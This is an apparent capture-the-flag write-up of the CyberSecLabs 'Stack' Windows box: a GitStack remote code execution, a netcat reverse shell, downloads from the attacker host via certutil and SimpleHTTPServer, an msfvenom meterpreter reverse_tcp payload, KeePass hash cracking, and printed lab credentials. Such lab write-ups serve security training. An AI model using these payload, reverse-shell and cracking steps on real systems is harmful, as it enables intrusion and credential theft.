Pentest Everything

Stack

https://www.cyberseclabs.co.uk/labs/info/Stack/

Scanning and Enumeration

Nmap

Running an initial Nmap scan of all TCP ports (-p-) with the -A switch produces the following.

sudo nmap 172.31.1.12 -p- -A

PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: STACK
|   NetBIOS_Domain_Name: STACK
|   NetBIOS_Computer_Name: STACK
|   DNS_Domain_Name: Stack
|   DNS_Computer_Name: Stack
|   Product_Version: 6.3.9600
|_  System_Time: 2020-12-09T10:05:50+00:00
| ssl-cert: Subject: commonName=Stack
| Not valid before: 2020-12-08T09:56:41
|_Not valid after:  2021-06-09T09:56:41
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49163/tcp open  msrpc              Microsoft Windows RPC
49164/tcp open  msrpc              Microsoft Windows RPC

Port 445 (SMB)

First up, we can check SMB for null-session (anonymous) access. Unfortunately I was unable to authenticate this way with various tools.

Enum4linux also aborted due to null authentication errors.

Port 80 (HTTP)

Port 80 is also open (it does not appear in the scan output pasted above, but the target serves http://172.31.1.12), so we can start with Gobuster and Nikto to see what information we can pull before manually browsing to the webpage.

The Firefox extension Wappalyzer confirms the following information about the webpage.

Dirb

Gobuster returned nothing, so I switched to dirb, which enumerates directories recursively. It found the /web/ directory and then /web/index.php inside it.

After browsing to that directory we come to the following page.

Exploitation

After searching around this I found nothing of interest, only dead ends. We do have a name in the browser tab: 'GitStack Web'.

A Google search for that name turns up 'GitStack - Remote Code Execution' on exploit-db.com.

This is a Python script in which all we need to do is change the target IP and the command we want to execute. It should give us remote command execution on the server.

We can run the script and confirm remote code execution with the ipconfig command.

Reverse Shell as user

We should now attempt to gain a proper reverse shell so we can enumerate the server properly.

I started by opening a Python SimpleHTTPServer in a directory that hosts nc.exe.

sudo python2 -m SimpleHTTPServer 80

Then I edited the exploit so that the command it runs downloads nc.exe from my attacking machine.

I then started a netcat listener on my attacking machine in preparation for the next step.

nc -lvp 4444

Now we can edit the command in the exploit so that the uploaded nc.exe connects back to the listener running on our attacking machine.

After executing the exploit we get a reverse shell and can confirm the user we are running as.

Privilege Escalation

I then downloaded winPEAS.exe from my attacking machine with certutil.exe. Note the flag order (the switch is -split, with its leading dash) and the output filename at the end.

certutil.exe -urlcache -split -f http://<IP>/winpeas.exe winpeas.exe

After running it we can see that we hold 'SeImpersonatePrivilege'.

I then ran the systeminfo command on the system to check the OS version.

As we are running Windows Server 2012 R2 Standard and hold SeImpersonatePrivilege, we can more than likely run a JuicyPotato / RottenPotato attack to escalate our privileges.

I ran the systeminfo output through Windows-Exploit-Suggester (windows-exploit-suggester.py), which reinforced that we can likely use this type of attack for privilege escalation.
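The two facts that make the Potato family worth trying are the impersonation privilege and the OS build, so they are worth checking mechanically before spending time on CLSIDs. As an added example (not part of the original writeup), the following Python script applies that check to saved output. The `whoami /priv` and `systeminfo` lines are constructed samples shaped like the real commands' output, not captures from the Stack box; the build number 9600 matches the Product_Version 6.3.9600 that the rdp-ntlm-info script reported above. The 17763 cut-off (Windows 10 1809 / Server 2019) is where JuicyPotato's DCOM trick stopped working, after which a newer variant such as RoguePotato or PrintSpoofer is needed.

```python
import re

# Constructed sample output in the shape `whoami /priv` prints on a Windows host
# (made up for this example, not captured from the Stack box).
WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed sample output in the shape of the first lines of `systeminfo`.
SYSTEMINFO = """
Host Name:                 STACK
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
"""

# Potato-style exploits need one of these token privileges. The State column may read
# "Disabled" and still count: a process can enable any privilege its token holds.
POTATO_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# JuicyPotato stopped working at Windows 10 1809 / Server 2019 (build 17763).
JUICY_MAX_BUILD = 17763


def parse_privileges(text):
    """Return {privilege name: state} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        # Data rows start with Se...Privilege and end with Enabled/Disabled; headers do not.
        if (len(parts) >= 3 and parts[0].startswith("Se")
                and parts[0].endswith("Privilege") and parts[-1] in ("Enabled", "Disabled")):
            privs[parts[0]] = parts[-1]
    return privs


def parse_build(text):
    """Return (os_name, build_number) from `systeminfo` output; None where absent."""
    name = re.search(r"^OS Name:\s+(.+?)\s*$", text, re.MULTILINE)
    build = re.search(r"^OS Version:.*?Build (\d+)", text, re.MULTILINE)
    return (name.group(1) if name else None, int(build.group(1)) if build else None)


def triage(priv_text, sysinfo_text):
    """Decide whether a Potato-family escalation is worth attempting, and which kind."""
    privs = parse_privileges(priv_text)
    held = sorted(p for p in privs if p in POTATO_PRIVS)
    os_name, build = parse_build(sysinfo_text)
    if not held:
        verdict = "no impersonation privilege: Potato-family escalation not applicable"
    elif build is None:
        verdict = "impersonation privilege held; OS build unknown, check systeminfo"
    elif build < JUICY_MAX_BUILD:
        verdict = "JuicyPotato/RottenPotato candidate (needs an OS-specific CLSID)"
    else:
        verdict = "build >= 17763: JuicyPotato will not work, use a newer Potato variant"
    return {"privileges": held, "os_name": os_name, "build": build, "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(WHOAMI_PRIV, SYSTEMINFO).items():
        print(f"{key}: {value}")
```

On a real engagement, paste the two commands' output into the sample strings (or read them from files) and run the script; the verdict is only a starting point, since the CLSID still has to be found for the specific OS image.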

I previously covered a JuicyPotato attack, without Metasploit, in my writeup for HackTheBox's Bart, so I will take this opportunity to include the Metasploit version of the attack in a writeup.

First I created a payload for meterpreter with msfvenom.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.0.173 LPORT=4455 -f exe -o /home/kali/scripts/windows/metshell.exe

I then downloaded the payload on to the machine with certutil.exe.

I then ran the exploit/multi/handler module in Metasploit, set LHOST and LPORT to match the msfvenom command, and set the payload to exactly the same one specified there. Once the handler was listening, I executed the uploaded payload on the server.

At this point it could take a while to find the correct CLSID to use against this server: the CLSID JuicyPotato needs is specific to the target OS, and the candidates for that OS have to be tried one at a time. I want to explore other attack vectors first.

One of the interesting bits of information I found earlier was a file called 'password_manager.kdbx'.

A Google search shows that the .kdbx extension belongs to KeePass, a password manager, and that the file is a KeePass database.

Searching for ways to attack a KeePass database file, I found some blog posts showing that the database can be converted into a hash with keepass2john, part of John the Ripper, which we can then attempt to crack.

Since we are already in a meterpreter shell we can just run the download command with the path of the KeePass database to download.

We can then run the keepass2john command on Kali to convert the file to a hash format.

keepass2john password_manager.kdbx > /home/kali/Desktop/keepassdatabase.hash

We can then check the list of formats John supports to find the matching one.

We can then run John against the hash with the --format=KeePass switch.

sudo john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/Desktop/keepassdatabase.hash 

Now that John has cracked the master password as 'princess', we can install KeePass2 and see if we can open the database file with it.
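Before launching a wordlist it is worth knowing what keepass2john actually extracted, because the transform-round count in the hash is what decides how slowly rockyou.txt will run: every guess costs that many AES-ECB encryptions of the 32-byte key. As an added example (not from the original writeup), this Python parser reads one keepass2john output line, validates its fields and reports the database version, cipher and round count. The hash line is constructed for the example with made-up hex values; it is not the real password_manager.kdbx hash. The field order follows the keepass2john / hashcat mode 13400 layout for KeePass 2.x databases.

```python
import re

# Constructed sample in the shape keepass2john prints for a KeePass 2.x (.kdbx) database:
#   <db name>:$keepass$*2*<rounds>*<algo>*<master seed>*<transform seed>*<enc IV>
#             *<expected start bytes>*<first 32 bytes of ciphertext>
# The hex values are made up for this example (not from the Stack box's database).
SAMPLE_LINE = (
    "password_manager:$keepass$*2*6000*0*"
    + "aa" * 32 + "*" + "bb" * 32 + "*" + "cc" * 16 + "*" + "dd" * 32 + "*" + "ee" * 32
)

# Field layout after the version/rounds/algorithm fields of a version-2 line: name, byte length.
V2_FIELDS = (("master_seed", 32), ("transform_seed", 32), ("enc_iv", 16),
             ("expected_start_bytes", 32), ("contents", 32))

# Cipher selector used by the hash format (1.x databases may also use Twofish).
ALGORITHMS = {0: "AES", 1: "Twofish"}


def _hex_field(name, value, nbytes):
    """Decode one hex field, enforcing its expected byte length."""
    if not re.fullmatch(r"[0-9a-fA-F]+", value) or len(value) != nbytes * 2:
        raise ValueError(f"{name}: expected {nbytes} bytes of hex, got {value!r}")
    return bytes.fromhex(value)


def parse_keepass_hash(line):
    """Parse one keepass2john output line into a dict; raise ValueError if malformed."""
    line = line.strip()
    name = None
    if not line.startswith("$keepass$"):
        name, _, line = line.partition(":")  # keepass2john prefixes the database name
    parts = line.split("*")
    if parts[0] != "$keepass$" or len(parts) < 4:
        raise ValueError("not a $keepass$ hash line")
    version, rounds, algo = int(parts[1]), int(parts[2]), int(parts[3])
    if version not in (1, 2):
        raise ValueError(f"unknown KeePass hash version {version}")
    if algo not in ALGORITHMS:
        raise ValueError(f"unknown algorithm id {algo}")
    info = {
        "name": name,
        "version": version,
        "rounds": rounds,
        "algorithm": ALGORITHMS[algo],
        # The key transform is `rounds` AES-ECB encryptions of a 32-byte key, i.e. two
        # AES blocks per round, so this is the per-guess work the cracker has to do.
        "aes_blocks_per_guess": rounds * 2,
    }
    if version == 2:
        expected = 4 + len(V2_FIELDS)
        if len(parts) != expected:
            raise ValueError(f"version 2 line should have {expected} fields, got {len(parts)}")
        for (fname, nbytes), value in zip(V2_FIELDS, parts[4:]):
            info[fname] = _hex_field(fname, value, nbytes)
    # Version-1 (.kdb) lines carry further trailing fields (inline flag, data length,
    # data or its hash); only the common leading fields are interpreted here.
    return info


if __name__ == "__main__":
    h = parse_keepass_hash(SAMPLE_LINE)
    print(f"{h['name']}: KeePass v{h['version']}, {h['algorithm']}, "
          f"{h['rounds']} transform rounds ({h['aes_blocks_per_guess']} AES blocks per guess)")
```

Run it on the real file with, for example, `python3 parse_keepass_hash.py < keepassdatabase.hash` adapted to read stdin; a database with a round count in the tens of millions is a sign to pick a targeted wordlist rather than all of rockyou.txt.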

sudo apt-get install keepass2

Once installed, open KeePass2 and load the database file. You will then be presented with a credentials screen to open the database.

We can then open the Administrators profile and view the stored password.

John's password:

We now have credentials to the following:

  • Administrator:secur3_apass262

  • John:whLd49NnsDWRJ7KW

I actually tried cracking the NTLMv2 hash for the John account much earlier on, before I noticed the KeePass file on the system. I captured it by setting up an SMB server on my attacking machine and getting the user account to authenticate against it. It makes sense that I could not crack it when the password is that strong.

Since RDP is open, I connected as the Administrator account and was successful.

We can also log in with Evil-WinRM, as port 5985 (WinRM) is open.

Notes

Browsing to http://172.31.1.12 in a web browser shows the following root page.

I tried multiple times to get the Metasploit module working for JuicyPotato and could not get a valid CLSID to perform the escalation with.

References

  • CLSID list (JuicyPotato)
  • GitStack - Remote Code Execution (Exploit Database)